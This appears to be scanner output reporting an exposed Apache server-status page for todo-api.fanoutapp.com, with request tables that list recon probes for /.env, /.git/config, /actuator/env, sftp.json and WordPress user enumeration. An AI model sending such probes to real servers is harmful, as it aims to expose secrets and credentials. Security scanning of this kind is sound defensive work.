0.160371970.00.021.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 0-3732736700/6/594_ 0.160365750.00.021.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 0-3732736700/8/584_ 0.160380290.00.021.77 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-3732736710/4/400_ 0.12688769470.00.011.35 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-3732736710/5/395_ 0.12550572250.00.011.06 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3732736710/4/390_ 0.12689747050.00.011.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 1-3732736710/4/398_ 0.12688440870.00.011.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-3732736710/2/415_ 0.09643365070.00.011.35 127.0.0.1http/1.1api.hnstream.com:8000GET /api/.git/config HTTP/1.1 1-3732736710/3/404_ 0.12689550980.00.011.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-3732736710/4/413_ 0.10646351700.00.011.42 127.0.0.1http/1.1api.hnstream.com:8000GET /test/.git/config HTTP/1.1 1-37327367111/5/399W 0.120042380.00.011.09 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3732736710/3/403_ 0.10683444490.00.010.97 127.0.0.1http/1.1api.hnstream.com:8000GET /data/processing/.git/config HTTP/1.1 1-3732736710/6/386_ 0.124359970.00.021.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3732736710/5/400_ 0.131356260.00.011.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3732736710/5/403_ 0.133346880.00.021.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3732736710/5/402_ 0.12638040880.00.010.96 127.0.0.1http/1.1hnstream.com:8000GET /sitemap.ashx HTTP/1.1 1-3732736710/7/392_ 0.133336080.00.021.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-3732736710/4/409_ 0.12688752360.00.011.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-3732736710/5/391_ 0.132349790.00.021.04 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3732736710/4/406_ 0.12652044650.00.011.17 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-3732736710/6/408_ 0.132361370.00.021.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3732736710/5/399_ 0.12652045110.00.011.14 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 1-3732736710/4/383_ 0.131350070.00.010.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3732736710/4/398_ 0.12651046890.00.011.11 127.0.0.1http/1.1hnstream.com:8000GET /sitemap HTTP/1.1 1-3732736710/4/398_ 0.11631847700.00.011.28 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-3732736710/3/390_ 0.116331253710.00.011.24 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3732736710/7/391_ 0.140340840.00.020.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf0169b744
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Friday, 14-Feb-2025 14:34:14 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 36 Parent Server MPM Generation: 35 Server uptime: 34 days 15 hours 55 minutes 17 seconds Server load: 0.39 0.33 0.26 Total accesses: 32373 - Total Traffic: 90.6 MB - Total Duration: 472404 CPU Usage: u50.63 s84.15 cu690.04 cs259.49 - .0362% CPU load .0108 requests/sec - 31 B/second - 2933 B/request - 14.5925 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03094629no0yes124000 13094630no0yes025000 Sum200 149000 ____W_____________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3530946290/13/550_ 0.3303100680.00.031.19 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-3530946290/10/539_ 0.3303100260.00.091.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3530946290/14/544_ 0.330373620.00.031.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3530946290/10/572_ 0.330384770.00.031.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-35309462911/11/513W 0.320078500.00.021.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3530946290/7/549_ 0.321368181560.00.011.35 127.0.0.1http/1.1hnstream.com:8000GET /server-status HTTP/1.1 0-3530946290/12/547_ 0.321367078390.00.021.57 127.0.0.1http/1.1hnstream.com:8000GET /login.action HTTP/1.1 0-3530946290/7/543_ 0.321367074060.00.011.22 127.0.0.1http/1.1hnstream.com:8000GET /_all_dbs HTTP/1.1 0-3530946290/8/542_ 0.321367076710.00.021.91 127.0.0.1http/1.1hnstream.com:8000GET /.env HTTP/1.1 0-3530946290/12/562_ 0.321367083500.00.021.51 127.0.0.1http/1.1hnstream.com:8000GET /.DS_Store HTTP/1.1 0-3530946290/11/526_ 0.321367075300.00.031.34 127.0.0.1http/1.1hnstream.com:8000GET /s/1393e2339313e2130313e2135313/_/;/META-INF/maven/com.atla 0-3530946290/12/551_ 0.321367083980.00.021.66 127.0.0.1http/1.1hnstream.com:8000GET /.git/config HTTP/1.1 0-3530946290/8/526_ 0.321367078390.00.011.21 127.0.0.1http/1.1hnstream.com:8000GET /config.json HTTP/1.1 0-3530946290/10/557_ 0.321366083970.00.021.42 127.0.0.1http/1.1hnstream.com:8000GET /telescope/requests HTTP/1.1 0-3530946290/10/535_ 0.321366089500.00.021.40 127.0.0.1http/1.1hnstream.com:8000GET /info.php HTTP/1.1 0-3530946290/10/552_ 0.3213660106720.00.021.48 127.0.0.1http/1.1hnstream.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-3530946290/9/531_ 0.291361396170.00.021.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3530946290/12/546_ 0.32288572060.00.101.81 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3530946290/11/549_ 0.29283367160.00.031.61 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3530946290/9/549_ 0.3213175350.00.101.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3530946290/10/531_ 0.321476930.00.021.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3530946290/12/562_ 0.320369300.00.031.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3530946290/11/521_ 0.330370370.00.021.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-3530946290/10/563_ 0.330364150.00.021.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3530946290/11/542_ 0.330377830.00.031.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3530946300/5/316_ 0.23428360720.00.011.05 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-3530946300/6/314_ 0.23428363660.00.010.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 1-3530946300/6/308_ 0.23428142490.00.081.15 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-3530946300/6/317_ 0.224232635590.00.011.13 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/5/336_ 0.24205151960.00.001.05 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-3530946300/5/329_ 0.240247340.00.081.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-3530946300/8/337_ 0.240348180.00.011.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3530946300/6/318_ 0.23429338640.00.010.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 1-3530946300/10/327_ 0.23431340710.00.020.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-3530946300/7/304_ 0.22431445480.00.011.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-3530946300/4/322_ 0.23431352580.00.011.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3530946300/6/317_ 0.23429342960.00.010.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3530946300/6/319_ 0.23430431020.00.020.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-3530946300/7/306_ 0.23429331740.00.011.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 1-3530946300/5/331_ 0.22200848830.00.011.10 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3530946300/8/312_ 0.241245510.00.090.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-3530946300/6/329_ 0.224321841420.00.081.05 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-3530946300/7/331_ 0.22431352560.00.011.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3530946300/7/320_ 0.224311441560.00.011.01 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3530946300/10/309_ 0.23430345610.00.020.83 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3530946300/4/323_ 0.23429343910.00.010.94 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-3530946300/7/323_ 0.23430144500.00.021.06 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3530946300/8/311_ 0.23430343820.00.021.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-3530946300/5/302_ 0.23430336910.00.010.78 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.edis
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfe84a8c67
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 12-Feb-2025 12:46:15 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 34 Parent Server MPM Generation: 33 Server uptime: 32 days 14 hours 7 minutes 18 seconds Server load: 0.13 0.19 0.18 Total accesses: 30305 - Total Traffic: 84.8 MB - Total Duration: 454249 CPU Usage: u47.53 s79.48 cu650.83 cs244.18 - .0363% CPU load .0108 requests/sec - 31 B/second - 2933 B/request - 14.9892 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02919530no0yes025000 12919531no0yes124000 Sum200 149000 _________________________W________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3329195300/10/523_ 0.221707696710.00.031.14 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-3329195300/9/508_ 0.2432797050.00.101.65 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3329195300/8/513_ 0.22500671300.00.021.58 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-3329195300/8/542_ 0.243282390.00.091.53 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3329195300/9/483_ 0.2431272670.00.020.97 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3329195300/5/518_ 0.243380290.00.011.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3329195300/10/522_ 0.243572490.00.011.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-3329195300/8/518_ 0.243373120.00.021.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-3329195300/7/511_ 0.243474450.00.011.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3329195300/8/529_ 0.243381160.00.021.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3329195300/7/495_ 0.242472590.00.021.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3329195300/10/518_ 0.252175210.00.021.53 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3329195300/6/505_ 0.252376280.00.011.09 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-3329195300/9/524_ 0.252382140.00.021.36 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-3329195300/8/508_ 0.252388460.00.021.34 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-3329195300/7/518_ 0.252391820.00.011.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-3329195300/7/503_ 0.261388730.00.011.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-3329195300/8/510_ 0.261465580.00.021.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 0-3329195300/5/522_ 0.261366030.00.011.55 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /config.json HTTP/1.1 0-3329195300/9/512_ 0.261372830.00.021.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-3329195300/5/507_ 0.261375070.00.011.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /info.php HTTP/1.1 0-3329195300/9/525_ 0.261167170.00.091.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-3329195300/8/496_ 0.212319569470.00.021.36 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3329195300/5/533_ 0.241712562410.00.011.30 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3329195300/7/513_ 0.24505675820.00.011.57 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-33291953111/8/265W 0.320053050.00.020.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3329195310/10/260_ 0.322334452630.00.020.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-3329195310/10/262_ 0.322334634930.00.020.97 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 1-3329195310/11/263_ 0.322334332390.00.020.94 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-3329195310/10/284_ 0.322333649500.00.020.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-3329195310/12/276_ 0.322333744420.00.020.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-3329195310/10/287_ 0.302328645430.00.021.18 167.82.132.35http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-3329195310/12/261_ 0.302310535730.00.050.83 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3329195310/10/262_ 0.322315537790.00.020.70 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3329195310/8/256_ 0.333443390.00.021.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3329195310/11/267_ 0.301215650280.00.030.97 140.248.74.98http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3329195310/9/259_ 0.3312203339980.00.020.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-3329195310/9/274_ 0.331107729340.00.030.68 157.52.108.88http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-3329195310/14/257_ 0.333329790.00.130.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-3329195310/7/282_ 0.33490046640.00.020.92 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-3329195310/11/252_ 0.3011024840570.00.020.69 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-3329195310/12/277_ 0.332538400.00.030.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-3329195310/12/271_ 0.30485847210.00.021.01 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 1-3329195310/5/270_ 0.333338910.00.010.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3329195310/7/250_ 0.332337630.00.020.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3329195310/11/276_ 0.332341630.00.030.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3329195310/10/268_ 0.331341530.00.020.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3329195310/11/257_ 0.331441150.00.020.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3329195310/7/253_ 0.330334250.00.020.66 127.0.0.1http/1.1todo-api.fanoutapp.com:
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf5f6e015d
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Monday, 10-Feb-2025 15:25:21 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 30 days 16 hours 46 minutes 24 seconds Server load: 0.03 0.17 0.19 Total accesses: 28770 - Total Traffic: 81.0 MB - Total Duration: 437492 CPU Usage: u44.81 s75.59 cu609.13 cs229.53 - .0362% CPU load .0108 requests/sec - 32 B/second - 2952 B/request - 15.2065 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02747872no0yes124000 22747873no0yes025000 Sum200 149000 ____________W____________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3127478720/12/496_ 0.3442795300.00.021.09 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/10/481_ 0.2937782930.00.021.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 0-3127478720/12/490_ 0.3542669470.00.031.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3127478720/10/515_ 0.353480620.00.021.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-3127478720/9/458_ 0.353366250.00.020.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-3127478720/10/498_ 0.352378590.00.021.24 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-3127478720/10/495_ 0.352371230.00.021.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-3127478720/10/494_ 0.351371900.00.021.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-3127478720/8/489_ 0.351373260.00.011.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-3127478720/10/505_ 0.350379220.00.021.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-3127478720/13/473_ 0.351470990.00.021.23 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-3127478720/10/495_ 0.350373820.00.021.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-31274787211/12/483W 0.330075080.00.020.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-3127478720/9/498_ 0.321527879730.00.021.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 0-3127478720/11/485_ 0.341254681690.00.021.29 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/8/494_ 0.321249090540.00.021.37 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-3127478720/11/480_ 0.341172787490.00.021.14 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 0-3127478720/6/487_ 0.321167564110.00.011.61 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/11/499_ 0.34812864550.00.021.48 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 0-3127478720/9/486_ 0.32807670360.00.011.11 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/13/482_ 0.3492873650.00.031.22 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 0-3127478720/8/499_ 0.29813065880.00.021.19 127.0.0.1http/1.1api.hnstream.com:8000GET /cdn-cgi/trace HTTP/1.1 0-3127478720/10/474_ 0.3287967870.00.021.25 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/default/changes/?link=true&after=63 HTTP/1.1 0-3127478720/8/511_ 0.29861961130.00.021.27 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-3127478720/12/490_ 0.34861974590.00.021.53 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/244. 0.00487497242210.00.000.82 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/237. 0.004874973346190.00.000.68 167.82.173.44http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/236. 0.00487497033150.00.000.85 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-25-0/0/238. 0.004874972230670.00.000.89 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-25-0/0/256. 0.00487497648420.00.000.82 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-25-0/0/251. 0.004874971738770.00.000.84 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/259. 0.00487497143320.00.001.12 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/235. 0.00487497634720.00.000.68 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/236. 0.00487497636150.00.000.65 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/236. 0.00487497642540.00.000.90 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/242. 0.00487497648490.00.000.92 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/232. 0.00487497138480.00.000.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00487497528040.00.000.61 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/230. 0.00487497827550.00.000.79 157.52.123.24http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-25-0/0/259. 0.00487497639650.00.000.87 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/229. 0.00487497138810.00.000.65 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/249. 0.00487497136440.00.000.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-25-0/0/247. 0.00487497645950.00.000.97 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/248. 0.004874971737990.00.000.84 140.248.75.174http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-25-0/0/228. 0.004874971936650.00.000.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-25-0/0/248. 0.00487497635120.00.000.76 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-25-0/0/241. 0.004874971234010.00.000.85 157.52.117.82http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-25-0/0/234. 0.004874971628370.00.000.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-25-0/0/234. 0.00487497332870.00.000.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfac9fe1ab
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Saturday, 08-Feb-2025 12:07:48 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 28 days 13 hours 28 minutes 51 seconds Server load: 0.14 0.14 0.16 Total accesses: 26988 - Total Traffic: 76.3 MB - Total Duration: 421047 CPU Usage: u41.63 s70.46 cu568.74 cs214.51 - .0363% CPU load .0109 requests/sec - 32 B/second - 2964 B/request - 15.6013 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02571705no0yes124000 22571706no0yes025000 Sum200 149000 ______W__________________.........................______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2925717050/14/459_ 0.312388750.00.031.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2925717050/5/450_ 0.312376420.00.011.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2925717050/14/452_ 0.311367580.00.031.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 